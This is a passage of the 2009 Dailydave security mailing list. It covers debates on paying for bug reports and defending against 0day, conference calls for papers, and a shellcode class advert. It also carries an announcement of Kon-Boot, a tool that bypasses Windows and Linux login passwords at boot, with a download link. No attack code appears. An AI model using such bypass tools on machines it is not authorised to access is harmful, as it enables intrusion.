Of course, if we assumed that half of those researchers who stopped notifying
vendors went underground (I mean commercialized cyber-crime here), then maybe
*some* vendors (e.g. A/V) would be willing to hire more analysts. Of course,
the AV would love the whole situation with more cyber-criminals all around
(hush!). In fact, those few researchers that didn't go underground would love
the situation too (more job offerings). But the whole point of this
initiative, AFAIU, is to find out a *legal* way of making money on bugs.

> I don't have the solution, I just know nothing will ever change if the status
> quo remains. The only thing we can do is stop giving away our work and see
> what happens.

And who said we're giving it away for *free*? Some of us get recognition for
our research and *legit* consulting/research jobs in return. We show our
skills, we get a job -- this is how it has worked for many years.
Also, maybe finding the n-th QuickTime or Acrobat bug isn't really worth that
much as some of us would like to think (based on what we hear the underground
pays)? While I can totally appreciate and admire a well written exploit, this
is more of an art, rather than something of utmost importance for the
industry. I mean... what does this n-th bug for Acrobat (or even exploit)
really change? Prove anything? Maybe such things simply aren't worth that much
in the *legit* world?

> I think the ideal solution would be all the big vendors would have to
> contribute to some fund (held at CERT or something) which could be used to
> pay independent researchers who find and report bugs.

That smells of communism to me ;) Not that I remember much of those times
myself, but anyway ;)

joanna.

From jt at cr0.org Wed Apr 8 18:04:15 2009
From: jt at cr0.org (Julien TINNES)
Date: Thu, 9 Apr 2009 00:04:15 +0200
Subject: [Dailydave] No more free bugs (and WOOT)
References: <20090408182348.GA30844@cr0.org>
Message-ID: <200904090004.15332.jt@cr0.org>

On Wednesday 08 April 2009, Charles Miller wrote:
> Hi Julien,
>
> I think you misunderstand. I'm all for responsible disclosure. I
> just think those doing the disclosure should be rewarded for their
> efforts. (This is how NMFB is fundamentally different from
> antisecurity.is I believe)

In an ideal world yes, as should people finding other (non-security) bugs.

> As for benefiting the general public, if researchers were actually
> rewarded for their work, more of them would look for (and report)
> vulnerabilities and the public would actually be better off. Ask
> yourself the question, would more IE bugs be found if the reward was a
> researcher's name in an advisory or a big lump of cash.

If a software company wants to give bounties for this, I think it's a good
idea, but I'm not sure how this campaign may help. If researchers stopped
releasing bugs for free, companies would not suddenly start paying for them.
Unfortunately most software companies would be perfectly happy without all
those pesky hackers messing around with their code. It's already hard to get
some software companies to care and correct the bugs you give them for free (I
have numerous examples, as I'm sure you do); I can't imagine what the
situation would be if they had to buy them. It may actually give them a
perfectly valid excuse for not looking at the bug.

To me, full disclosure would be more of a solution to this particular problem
than trying to sell bugs. Unfortunately, it has lots of unwanted side effects
too :)

Julien

From cmiller at securityevaluators.com Wed Apr 8 21:00:48 2009
From: cmiller at securityevaluators.com (Charles Miller)
Date: Wed, 8 Apr 2009 20:00:48 -0500
Subject: [Dailydave] No more free bugs (and WOOT)
In-Reply-To: <200904090004.15332.jt@cr0.org>
References: <20090408182348.GA30844@cr0.org> <200904090004.15332.jt@cr0.org>
Message-ID: <2BD8033E-79D4-4CD3-ACAF-96EEDC40A800@securityevaluators.com>

Yea, I don't know. It will hopefully help, but it might not. I think the idea
is if good guys stop reporting bugs and good guys and bad guys continue to
look for (and find) bugs, vendors will be hurt as more vulnerabilities will
begin to be exploited in the wild than otherwise. Only one thing is for sure:
if we don't take any action at all, nothing will change.

Charlie

On Apr 8, 2009, at 5:04 PM, Julien TINNES wrote:
> If a software company wants to give bounties for this, I think it's a good
> idea, but I'm not sure how this campaign may help.
From professor0110 at gmail.com Wed Apr 8 21:42:56 2009
From: professor0110 at gmail.com (Professor 0110)
Date: Thu, 9 Apr 2009 11:42:56 +1000
Subject: [Dailydave] No more free bugs (and WOOT)

I hope that won't mean that these bugs will stop being released to places like
BugTraq etc. Information Security personnel like myself still like to look at
these bugs and on occasion use them.

Cheers,
Professor 0110

From krahmer at suse.de Thu Apr 9 05:12:44 2009
From: krahmer at suse.de (Sebastian Krahmer)
Date: Thu, 9 Apr 2009 11:12:44 +0200
Subject: [Dailydave] No more free bugs (and WOOT)
Message-ID: <20090409091244.GA12951@suse.de>

No more free bucks?

On Wed, Apr 08, 2009 at 11:17:29AM -0500, Charles Miller wrote:
> Hi everybody.
>
> You may have heard some about the No More Free Bugs campaign
> (http://blog.trailofbits.com/2009/03/22/no-more-free-bugs/). Basically, it
> is the chance for researchers to unite to get paid for the hard work we do.
> As long as folks continue to give bugs to

The hard work we do? Are you kidding? :)

I see dozens of unimportant "bugs" and advisories each day. Some of them
mention things I've thrown away during an audit b/c I thought nobody would
ever be interested in them, not to mention even pay for such silliness. I have
a different opinion for closed source products, but for open and free
software, it's fair to give them "free bugs". Nobody forces you to disclose
your sshd 0day, but if it's only about the bucks, we will end up in a weird,
even more insecure world, since ppl are hunting down bugs in the software that
offers the most profit and developers are waiting with bug reports until
products are released so they can earn money for a report instead of fixing
things right away. Early fixing and correct software becomes a money-loss and
so you will have plenty of buggy services running.
regards,
Sebastian

--
~ ~ perl self.pl
~ $_='print"\$_=\47$_\47;eval"';eval
~ krahmer at suse.de - SuSE Security Team
~ SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)

From msuiche at gmail.com Thu Apr 9 07:15:34 2009
From: msuiche at gmail.com (Matthieu Suiche)
Date: Thu, 9 Apr 2009 13:15:34 +0200
Subject: [Dailydave] No more free bugs (and WOOT)
Message-ID: <36615a170904090415g7a34a160j115e89081f458f4@mail.gmail.com>

Why is there a Coccinellidae with 7 spots on the logo?

--
Matthieu Suiche

From jim at manico.net Thu Apr 9 13:15:01 2009
From: jim at manico.net (Jim Manico)
Date: Thu, 9 Apr 2009 07:15:01 -1000
Subject: [Dailydave] OWASP Podcast w/ Dave

Daily Dave,

OWASP Podcast #16, an interview with Dave Aitel, is now live.

Direct Link: http://www.owasp.org/download/jmanico/owasp_podcast_16.mp3

Cheers!

- Jim Manico
OWASP Podcast Host
RSS: http://www.owasp.org/download/jmanico/podcast.xml
iTunes: http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=300769012

From philippelanglois at free.fr Mon Apr 13 07:10:55 2009
From: philippelanglois at free.fr (Philippe Langlois)
Date: Mon, 13 Apr 2009 13:10:55 +0200
Subject: [Dailydave] Hacker Space Fest 2009 CFP: Call For Paper
Message-ID: <874BB6FC-11A1-4F30-AB7F-0710EEB86CD1@free.fr>

Hey All,

This may be a bit different than regular CFPs you've seen around :)
Watch the topics specifically ;-)

Phil.

========================================================================
/tmp/lab announces the second Hacker Space Festival
(Paris, 26-30 June 2009)
========================================================================

Hacker Space Festival 2009 | Call For Proposals | HSF2009

In 2008, we organized HSF[1] on the spot, as an ad-hoc meeting for
hackerspaces-related networks, the technical and artistic research emerging
from them and the social questioning arising from them.
This sudden experiment proved to be a huge success, as much on the
self-organizing level as on the quality of the participants and meetings, as
well as the emotionally-charged ambience, the kind you make fond memories of.

The 2008 edition generated a strong emulation in France, from its historical
role as the first official hack meeting there, and in Europe with the
subsequent creation of the Hacker Space Brussels[2], the rapprochement with
The Fiber in Amsterdam and the hackerspaces.org[3] network. Initiatives of
hackerspace openings in Grenoble or Lille, or the upcoming FrHack[4]
conference, show an actual enthusiasm in the French hacker community that was
doomed to the "underground" not so long ago. We salute these initiatives and
their diversity!

Soon enough, we wanted to reiterate the HSF experience: however, it was out of
the question to institutionalize this temporary autonomous zone, nor to make
it an ersatz of the previous edition, nor even to wrap it into an "elite" or
"underground" aura. On the contrary, we ardently desire to explore further,
in all directions, some lesser known domains (see below) and to foster meeting
and sharing around experiences at the confluence of art, technology and
politics.

The world financial crisis, the decay of democracy in Europe, the
obscurantism, paranoia and lack of culture presiding over legislation
(Internet and Reaction... Err... Creation Law[5][6]) seem a fertile
environment for the sensible development of new (social...) life forms.
Quick! Let's rest for a few days in jubilation and ecstasy to take a deep
breath of freedom under the indelicate smells of the medicine factory nearby!

For if the public space is shrinking to oblivion, where any side-step becomes
suspect, and that from an early age (deviant behavior detection in nursery
school), where moving without a mobile phone becomes suspect (hello Julien
Coupat[7], a French political prisoner in France!), there's a domain that the
Leviathan would have a lot of trouble to contain, and for a reason: that of
sensitivity. Even the desperate attempts of the State to block the free and
premonitory expression of sense (hello Demeure du Chaos![8]) cannot do
anything against a loud laugh or a knowing glance, a sensual kiss or an
explosion of colors. Sensitivity, we could say, is what is left to a human
being when she has nothing anymore, and differentiates her from the body
corporate or the institution, which are, in essence, devoid of it.

Therefore, Art definitely remains the public space to share between humans,
and only between us. And if it is the last one to share, we propose to explore
it and take it over during the upcoming edition of the Hacker Space Festival,
from the 26th to 30th of June, 2009 at Vitry sur Seine[9].

========================================================================
Keynote Speakers: Sergey Grim and Larry Fake with Eric Schmoudt
Groogle Summer of Crode, Survivor style
"VLC, I vote against you because you really fucked up when..."
========================================================================

== W A N T E D =========================================================

Focus on solutions rather than problems.

* The Final (Hardware) Frontier: Open FPGA Cores, Reverse Engineering
* Designer Religions and Creative Beliefs Systems
* WiFiDoors & WiFi System-on-Chip controllers firmware hacking, infection & backdooring
* Telecom Core Network Equipment Reverse Engineering: MSC, STP, Switches, ...
* Algebraic Attacks and Modern Cryptography Attacks
* Autonomous, Parasitic and Viral Drones
* Enhanced or Infected Reality Swarms
* Auto-Builders / Self-Fabrication
* Embedded OS breakins stories & recipes
* Actualization rather than mere concepts
* FPGA & ASIC hacking / backdooring
* Cloud+Privacy+Open Source: O Brave New World?
* Explosion-Proof clothing
* Radio Appz & Hackz: Mesh @ RF Layer 1-3
* Database & Privacy
* Problematic & Ethical Open Source/Content Licenses
* Institutional Relationships: Lobbying or Licking?
* Non Lethal Protection (anti-taser vests?)
* Survival in the Age of the Ministry of Immigration and National Identity
* Mental asylum improvised visit
* Open Source Legacy Media(TM) Production Solutions (TV, Radio, Press, DRM)
* Gas Sensors & Environmental Benchmarking
* Building Hackerspaces Without Money
* Milsatcomm hacking: Military satellites shots, broken birds in the sky
* Other research topics on security and insecurity
* Academics and Hackers
* Organics and Fermentation
* Clean Food in Tainted Environment
* Low Impact Energy & Recycling
* Media Sandwich: layers of crap makes good food?
* Deconstructing Carla Sarkozy
* Knitting DIY Factory (jazzy, eh?)
* Signs of life among industrial wasteland
* Hallucinogenic & Computing: Can you Code on Acid?
* Mesh Networking (Wireless BattleMesh Royal!)
* Legal Sabotage: When Democracy Needs You

And anything that does not fit.

========================================================================
== P R O P O S E =======================================================

Send your contributions to HSF2009-CFP at lists.tmplab.org

+ Type of the proposal:
  1. conference (45min. presentation + 10min. for questions)
  2. workshop / demo (30 min. to 2 hours)
  3. installation / performance (music, plastic, sound, video)

Lightning talks can be proposed and organized until the last moment,
according to available space and schedule, in the form of BarCamps or Blitz
Conferences.
+ Required Information:
  * Title of the presentation
  * Type (see above)
  * Language: French or English
  * Name of speaker(s)
  * Affiliation (organization / company)
  * Short biography
  * Abstract (5 to 10 lines)
  * Topics / Keywords
  * Includes a demo? YES | NO
  * Release during the festival? YES | NO
  * Internet connection required? YES | NO

+ Acceptable Formats
  * Open Document
  * PDF
  * Plain Text
  * RTF

+ Agenda
  * beginning of proposals: now
  * end of proposals: 01 May 2009
  * selection notification: 07 May 2009
  * publication of program: 15 May 2009

+ Evaluation criteria for proposals:
  1. Innovating Topic
  2. Open Technology
  3. Demonstration / Live Act
  4. DIY Reproducibility
  5. Fun Potential

The Programming Committee resembles that of last year.
See: http://hackerspace.net/committee

========================================================================
== V E N U E ===========================================================

/tmp/lab
6 Bis rue Leon Geffroy
94400 Vitry sur Seine
France
http://hackerspace.net/directions

========================================================================
== P A R T I C I P A T E ===============================================

Email  : http://lists.tmplab.org/listinfo.cgi/hsf2009-talk-tmplab.org
CFPmail: HSF2009-CFP at lists.tmplab.org
IRC    : irc://irc.freenode.net/frlab
Jabber : xmpp:hsf2009 at space.cepheide.org?join
Wiki   : http://hackerspace.net/hsf2009

========================================================================
== L I N K S ===========================================================

The CFP is available online at http://hackerspace.net/cfp

[1] http://hackerspace.net/hsf2008
[2] http://hsb.wikidot.com/
[3] http://hackerspaces.org/
[4] http://www.frhack.org/
[5] http://jaimelesautistes.fr/
[6] http://laquadrature.net/
[7] http://fr.wikipedia.org/wiki/Julien_Coupat
[8] http://www.demeureduchaos.org/
[9] http://hackerspace.net/

--
Philippe Langlois
Email: philippelanglois at free.fr
PGP Key: 8DAEE244

From prabu at hackinthebox.org Wed Apr 15 00:03:14 2009
From: prabu at hackinthebox.org (S. Praburaajan)
Date: Wed, 15 Apr 2009 12:03:14 +0800
Subject: [Dailydave] HITBSecConf2009 - Malaysia: Call for Papers
Message-ID: <49E55C82.7080905@hackinthebox.org>

The Call for Papers for HITB Security Conference 2009 Malaysia is now open!

Talks that are more technical or that discuss new and never before seen attack
methods are of more interest than a subject that has been covered several
times before. Summaries not exceeding 1250 words should be submitted (in plain
text format) to cfp -at- hackinthebox.org for review and possible inclusion in
the programme. Submissions are due no later than 31st July 2009.

TOPICS

Topics of interest include, but are not limited to the following:

# 3G/4G Cellular Networks
# Apple / OS X security vulnerabilities
# SS7/Backbone telephony networks
# VoIP security
# Firewall technologies
# Intrusion detection
# Data Recovery, Forensics and Incident Response
# HSDPA and CDMA Security
# WIMAX Security
# Identification and Entity Authentication
# Network Protocol and Analysis
# Smart Card and Physical Security
# Virus and Worms
# WLAN, GPS, HAM Radio, Satellite, RFID and Bluetooth Security
# Analysis of malicious code
# Applications of cryptographic techniques
# Analysis of attacks against networks and machines
# File system security
# Security of Embedded Devices
# Side Channel Analysis of Hardware Devices

PLEASE NOTE: We do not accept product or vendor related pitches. If your talk
involves an advertisement for a new product or service your company is
offering, please do not submit.

Your submission should include:

# Name, title, address, email and phone/contact number
# Short biography, qualification, occupation (limit 250 words)
# Summary or abstract for your presentation (limit 1250 words)
# Technical requirements (video, internet, wireless, audio, etc.)

Each non-resident speaker will receive accommodation for 2 nights/3 days.
For each non-resident speaker, HITB will cover travel expenses up to USD 1,200.00. HITBSecConf2009 - Malaysia http://conference.hackinthebox.org/hitbsecconf2009kl/ From bania.piotr at gmail.com Thu Apr 16 01:17:37 2009 From: bania.piotr at gmail.com (Piotr Bania) Date: Thu, 16 Apr 2009 07:17:37 +0200 Subject: [Dailydave] KON-BOOT for Windows and Linux (Password Bypassing Utility for Forgetting Heads) Message-ID: <000301c9be52$a9078d90$5ee91953@DIED> Hello, As one of my past projects for KryptosLogic[1], Kon-Boot was moved to Windows platforms. So now it provides support for Microsoft Windows systems and also the Linux systems covered in previous releases. Kon-Boot for Windows enables logging in to any password-protected machine profile >>> without any knowledge of the password <<<. This tool changes the contents of the Windows kernel while booting; everything is done virtually, without any interference with physical system changes. So far the following Windows systems were tested to work correctly with Kon-Boot (however it's quite possible other versions of the listed Windows systems may be suitable as well): Currently supported Microsoft Windows systems: + Windows Server 2008 Standard SP2 (v.275) + Windows Vista Business SP0 + Windows Vista Ultimate SP1 + Windows Vista Ultimate SP0 + Windows Server 2003 Enterprise + Windows XP + Windows XP SP1 + Windows XP SP2 + Windows XP SP3 + Windows 7 Kon-Boot also works with virtual machines like VMware or VirtualPC. No special usage instructions are required for Windows users: just boot from the Kon-Boot CD/Floppy, select your profile and put in any password you want. You lost your password? Now it doesn't matter at all :-) You can download the Kon-Boot Windows&Linux version from the project website: http://piotrbania.com/all/kon-boot/ Please note: You may use this software only for personal, legal and non-commercial activity. 
best regards, Piotr Bania [1] http://kryptoslogic.com -- -------------------------------------------------------------------- Piotr Bania - - 0xCD, 0x19 Fingerprint: 413E 51C7 912E 3D4E A62A BFA4 1FF6 689F BE43 AC33 http://www.piotrbania.com - Key ID: 0xBE43AC33 -------------------------------------------------------------------- - "The more I learn about men, the more I love dogs." From dave at immunityinc.com Thu Apr 16 10:51:01 2009 From: dave at immunityinc.com (dave) Date: Thu, 16 Apr 2009 10:51:01 -0400 Subject: [Dailydave] Kostya teaches you how to write shellcode in Hong Kong! Message-ID: <49E745D5.6030305@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 So, when he's not writing CLOUDBURST-level exploits, Kostya has a tendency to rewrite CANVAS's Windows shellcode. As Justine would say "Shellcode is not hard, why does everyone go on about that?" But if you've never written shellcode before, or if you have only written Linux shellcode, Kostya's class will be perfect to get you up to speed from ... well...Kostya. :> First Day's SyScan 09 HK program (Don't miss Kostya's talk!): http://syscan.org/hk/program.html See Kostya's class here on day 2: http://syscan.org/hk/program_day2.html """ A 4-hour workshop, taught by a leading Immunity researcher, that introduces students to the fundamental requirement of preparing exploits for Windows machines: the development of Windows shellcode. Topics covered in this half-day, hands-on session include i386 assembler for shellcode writers, how to use the free tool Immunity Debugger, and the "hello world" of shellcoding: connect-back and execute. Attendees need to bring a laptop already installed with Immunity Debugger (http://www.immunityinc.com/products-immdbg.shtml) and Python 2.5. 
""" - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org iEYEARECAAYFAknnRdUACgkQtehAhL0gheqFiQCeM5PImbgPJuJ/B6d0QiCpQYcx fM8AnjO+V6y5zIeZEO+XCuBYl06gsqet =WIWB -----END PGP SIGNATURE----- From bania.piotr at gmail.com Thu Apr 16 12:56:22 2009 From: bania.piotr at gmail.com (Piotr Bania) Date: Thu, 16 Apr 2009 18:56:22 +0200 Subject: [Dailydave] Some "old" advisories: MS09-011 and VMware detection/DoS Message-ID: <010e01c9beb4$4661b910$5ee91953@DIED> Hello, Some old advisories of mine, if someone is interested: 1) Microsoft Windows DirectX MJPEG Decoder Remote Heap Corruption http://www.piotrbania.com/all/adv/ms-directx-mjpeg-adv.txt 2) VMware Workstation* IO Port Request Virtualized Machine Denial Of Service http://www.piotrbania.com/all/adv/vmware-io-adv.txt best regards, Piotr Bania * - probably other VMware virtualization products are affected as well -- -------------------------------------------------------------------- Piotr Bania - - 0xCD, 0x19 Fingerprint: 413E 51C7 912E 3D4E A62A BFA4 1FF6 689F BE43 AC33 http://www.piotrbania.com - Key ID: 0xBE43AC33 -------------------------------------------------------------------- - "The more I learn about men, the more I love dogs." From nate at root.org Fri Apr 17 17:29:02 2009 From: nate at root.org (Nate Lawson) Date: Fri, 17 Apr 2009 14:29:02 -0700 Subject: [Dailydave] If at RSA, stop by Baysec on Monday Message-ID: <49E8F49E.3010107@root.org> Hi all. If you're being forced by your company to do booth duty at RSA in San Francisco next week, feel free to stop by Baysec on Monday night. It's refreshingly not sponsored, meaning the only beer you get free is the one you convince your new friend to buy you. :) Here are the relevant details: Monday, April 20th, 7-11 pm Kate O'Briens http://www.kateobriens.com/map.cfm 579 Howard St. 
@ 2nd, San Francisco (415) 882-7240 Thanks, Nate From jeffcz at gmail.com Sun Apr 19 16:55:09 2009 From: jeffcz at gmail.com (Jeffrey Czerniak) Date: Sun, 19 Apr 2009 16:55:09 -0400 Subject: [Dailydave] How do I defend against 0day? Message-ID: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com> (Moved this conversation to dailydave per Dave's suggestion) Pardon my naivete... I am somewhere on the spectrum between "paid security professional" and "Symantec said zero infections, how did they get my bank password?" I'm one of those schmoes who reads security blogs, follows the NSA hardening guidelines, patches regularly, browses with Firefox/NoScript, but still realizes that there are 0day threats out there that could compromise my machine. On Twitter, Adam Shostack argued that in effect, I'm doing the right thing. (http://twitter.com/adamshostack/status/1527933467) Dave responded, no, 0day is rampant and I'm screwed. (http://twitter.com/daveaitel/status/1553055665) When I asked Dave what I should be doing to protect myself, he suggested I buy a copy of CANVAS, an Early Updates subscription, and take a class from Immunity. (http://twitter.com/daveaitel/status/1554813723) I have a couple of questions now. One, how do I put up a reasonable defense against 0day vulnerabilities? Two, how does purchasing a bunch of 0day from Immunity help me reach that goal? It seems like the purchase of CANVAS Early Updates would bring me from "I am certainly vulnerable to undefined 0day threats, and don't know how to protect myself" to "I now know about dozens of specific vulnerabilities in the software I use, and am scared shitless". Does CANVAS Early Updates come with a live dynamic binary patching system that protects me from the threats you've found? 
Otherwise, I don't know why I'd buy CANVAS since I'm not interested in hacking into other people's computers, and the non-disclosure agreement I'd have to sign would prevent me from disclosing those vulnerabilities to the vendors, thus I'm not really any safer. Let me ask this question from another perspective: let's say I won the lottery tomorrow and bought an Early Updates subscription. Certainly the IP I'd be buying access to is valuable to Immunity and you don't want it shared with vendors or your competition. What security precautions would you insist I take on the machine I stored that IP on? Thanks for reading this, Jeff geekable.com From rgula at tenablesecurity.com Mon Apr 20 11:04:45 2009 From: rgula at tenablesecurity.com (Ron Gula) Date: Mon, 20 Apr 2009 11:04:45 -0400 Subject: [Dailydave] How do I defend against 0day? In-Reply-To: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com> References: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com> Message-ID: <49EC8F0D.6060505@tenablesecurity.com> Your two main questions: > One, how do I put up a reasonable defense against 0day vulnerabilities? The short answer is to minimize complexity and then expect it to break. You need to minimize your overall attack surface and then look for failures. If you've already gone through everything on your network and you know it has been patched, configured correctly and is supposed to be there, then the next thing you need to ask yourself is what to expect when these services that you depend on get popped by a zero day. If you assume that some of your key services will get popped by a zero day, you might make changes in your architecture to minimize the effect of a compromise. > Two, how does purchasing a bunch of 0day from Immunity help me reach > that goal? Some of the zero-days that you don't know about will be covered by the Immunity feed. 
If you pen test with these zero-days that are not in the general public, you can test your systems to see how they react. Hopefully you will find that your admins, help desk, NIDS, SIM, etc. see something that alerts you to the presence of a compromised system. Ron Gula Tenable Network Security From jeffcz at gmail.com Mon Apr 20 12:02:21 2009 From: jeffcz at gmail.com (Jeffrey Czerniak) Date: Mon, 20 Apr 2009 12:02:21 -0400 Subject: [Dailydave] How do I defend against 0day? In-Reply-To: <2fd9390e0904200845n10720eefqbf3ec372d08b4538@mail.gmail.com> References: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com> <2fd9390e0904200845n10720eefqbf3ec372d08b4538@mail.gmail.com> Message-ID: <887088630904200902u46d9cb24p44ba7bb8aa9b411a@mail.gmail.com> On Mon, Apr 20, 2009 at 11:37 AM, Halvar Flake wrote: > I hope my post is not perceived as horribly rude, and please be aware > that I do not intend to offend in any way. And apologies up front if I do. > > Is this a serious post ? Yes. On Mon, Apr 20, 2009 at 11:45 AM, Andre Gironda wrote: > Every 0-day threat is different. Imagine telling doctors that they > can't allow disease, infections, et al to spread in a dying patient in > order to determine root-cause (ala House, the TV show). If you are > interested in understanding the problem, then you should also be > interested in "hacking into other people's computers" (or at least > your own computers). Ok, I'll accept the premise. So let's say I buy CANVAS with all the extra toppings, and use it to hack into my own machine. From the self-administered pen test, I discover that I'm vulnerable to x remote root exploits, and that my browser can be exploited via y different heap overflows in Firefox. If I am a rational decision-maker, what do I do with this information? My first instinct would be to tell the vendors, "fix this stuff now!" But according to immunitysec.com, I can't do that since CANVAS et al. are protected via NDA. 
So how do I leverage this new information to make myself safer and/or more secure? Jeff geekable.com From jeffcz at gmail.com Mon Apr 20 13:11:13 2009 From: jeffcz at gmail.com (Jeffrey Czerniak) Date: Mon, 20 Apr 2009 13:11:13 -0400 Subject: [Dailydave] How do I defend against 0day? In-Reply-To: <2fd9390e0904200954l1cb66d77ma7fa9ba8b20bba26@mail.gmail.com> References: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com> <2fd9390e0904200845n10720eefqbf3ec372d08b4538@mail.gmail.com> <887088630904200902u46d9cb24p44ba7bb8aa9b411a@mail.gmail.com> <2fd9390e0904200954l1cb66d77ma7fa9ba8b20bba26@mail.gmail.com> Message-ID: <887088630904201011k49b69353n984e037cd9915c56@mail.gmail.com> On Mon, Apr 20, 2009 at 12:54 PM, Andre Gironda wrote: > On Mon, Apr 20, 2009 at 9:02 AM, Jeffrey Czerniak wrote: >> So how do I leverage this new information to make myself safer and/or >> more secure? > > Is this a serious post? > Yes. In the meantime, I have figured out two ways that buying access to 0day under NDA can make me more secure: 1) Switch to an open-source operating system and open-source applications. Create custom forks of each of my applications' source trees, and patch my forks against the 0day vulnerabilities I purchased. Don't share my patches with the outside world. 2) Give up on computers and switch to a farming career. (Ok, maybe #2 wasn't so serious.) What am I missing? Dave is still in business after all these years, which means he must have plenty of customers. I had always assumed that the overwhelming majority of his customers are fellow pentesters, who buy CANVAS to guarantee they can break into systems. Are there folks on this list who buy CANVAS but who aren't pentesters? If so, what do you get out of CANVAS? Seriously, Jeff geekable.com From taosecurity at gmail.com Mon Apr 20 19:58:23 2009 From: taosecurity at gmail.com (Richard Bejtlich) Date: Mon, 20 Apr 2009 19:58:23 -0400 Subject: [Dailydave] How do I defend against 0day? 
In-Reply-To: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com> References: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com> Message-ID: <120ef0530904201658h54160cfet1a7864b4af7f30cd@mail.gmail.com> On Sun, Apr 19, 2009 at 4:55 PM, Jeffrey Czerniak wrote: > (Moved this conversation to dailydave per Dave's suggestion) > > Pardon my naivete... I am somewhere on the spectrum between "paid > security professional" and "Symantec said zero infections, how did > they get my bank password?" I'm one of those schmoes who reads > security blogs, follows the NSA hardening guidelines, patches > regularly, browses with Firefox/NoScript, but still realizes that > there are 0day threats out there that could compromise my machine. > > On Twitter, Adam Shostack argued that in effect, I'm doing the right > thing. (http://twitter.com/adamshostack/status/1527933467) > > Dave responded, no, 0day is rampant and I'm screwed. > (http://twitter.com/daveaitel/status/1553055665) > > When I asked Dave what I should be doing to protect myself, he > suggested I buy a copy of CANVAS, an Early Updates subscription, and > take a class from Immunity. > (http://twitter.com/daveaitel/status/1554813723) I find this fascinating. Can someone who advocates this point of view take the next steps? Assuming you buy CANVAS and subscribe to EU, and know what Immunity knows, and can test using CANVAS, what next? Thank you, Richard From nate at root.org Mon Apr 20 20:36:53 2009 From: nate at root.org (Nate Lawson) Date: Mon, 20 Apr 2009 17:36:53 -0700 Subject: [Dailydave] How do I defend against 0day? 
In-Reply-To: <887088630904200902u46d9cb24p44ba7bb8aa9b411a@mail.gmail.com> References: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com> <2fd9390e0904200845n10720eefqbf3ec372d08b4538@mail.gmail.com> <887088630904200902u46d9cb24p44ba7bb8aa9b411a@mail.gmail.com> Message-ID: <49ED1525.8010002@root.org> Jeffrey Czerniak wrote: > On Mon, Apr 20, 2009 at 11:45 AM, Andre Gironda wrote: >> Every 0-day threat is different. Imagine telling doctors that they >> can't allow disease, infections, et al to spread in a dying patient in >> order to determine root-cause (ala House, the TV show). If you are >> interested in understanding the problem, then you should also be >> interested in "hacking into other people's computers" (or at least >> your own computers). > > Ok, I'll accept the premise. So let's say I buy CANVAS with all the > extra toppings, and use it to hack into my own machine. From the > self-administered pen test, I discover that I'm vulnerable to x remote > root exploits, and that my browser can be exploited via y different > heap overflows in Firefox. > > If I am a rational decision-maker, what do I do with this information? > My first instinct would be to tell the vendors, "fix this stuff > now!" But according to immunitysec.com, I can't do that since > CANVAS et al. are protected via NDA. > > So how do I leverage this new information to make myself safer and/or > more secure? You find a mitigating approach ("disable javascript in PDF readers" or "switch from acrobat reader to preview" or "add Diehard to PDF reader in addition to browsers") and apply it to your desktops. Then you re-test and make sure you've fixed the problem. If this doesn't make sense to you or sounds too hard, then you're probably not in an organization where 0-day matters. Relax and wait for vendor patches that will appear some year. 
-- Nate From nathan.landon at digitaloperatives.com Mon Apr 20 22:02:13 2009 From: nathan.landon at digitaloperatives.com (Nathan Landon) Date: Mon, 20 Apr 2009 22:02:13 -0400 Subject: [Dailydave] How do I defend against 0day? In-Reply-To: <120ef0530904201658h54160cfet1a7864b4af7f30cd@mail.gmail.com> References: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com> <120ef0530904201658h54160cfet1a7864b4af7f30cd@mail.gmail.com> Message-ID: <37837550904201902u44d7ea1ds11554c71a4d6580b@mail.gmail.com> My argument would be that a security guy or administrator could use it as amplifying information while speaking to executives at their company. Executives (still) don't understand zero-days, or generally anything about how computer security works. CANVAS can help those IT folks amplify the information and demonstrate the importance of taking action (disabling services, changing vendors, buy more security technologies, etc) I personally have built exploits to prove that something is possible. Ultimately to show the potential for catastrophic failure or system/network compromise. These demonstrations always got executives "thinking". Nate Nathan Landon Digital Operatives www.digitaloperatives.com Cell: 808-221-9172 On Mon, Apr 20, 2009 at 7:58 PM, Richard Bejtlich wrote: > On Sun, Apr 19, 2009 at 4:55 PM, Jeffrey Czerniak > wrote: > > (Moved this conversation to dailydave per Dave's suggestion) > > > > Pardon my naivete... I am somewhere on the spectrum between "paid > > security professional" and "Symantec said zero infections, how did > > they get my bank password?" I'm one of those schmoes who reads > > security blogs, follows the NSA hardening guidelines, patches > > regularly, browses with Firefox/NoScript, but still realizes that > > there are 0day threats out there that could compromise my machine. > > > > On Twitter, Adam Shostack argued that in effect, I'm doing the right > > thing. 
(http://twitter.com/adamshostack/status/1527933467) > > Dave responded, no, 0day is rampant and I'm screwed. > > (http://twitter.com/daveaitel/status/1553055665) > > > > When I asked Dave what I should be doing to protect myself, he > > suggested I buy a copy of CANVAS, an Early Updates subscription, and > > take a class from Immunity. > > (http://twitter.com/daveaitel/status/1554813723) > > I find this fascinating. Can someone who advocates this point of view > take the next steps? Assuming you buy CANVAS and subscribe to EU, and > know what Immunity knows, and can test using CANVAS, what next? > > Thank you, > > Richard > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090420/22192b9c/attachment-0001.htm From halvar at gmx.de Tue Apr 21 10:23:20 2009 From: halvar at gmx.de (Halvar Flake) Date: 21 Apr 2009 16:23:20 +0200 Subject: [Dailydave] How do I defend against 0day? In-Reply-To: <887088630904201011k49b69353n984e037cd9915c56@mail.gmail.com> References: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com> <2fd9390e0904200845n10720eefqbf3ec372d08b4538@mail.gmail.com> 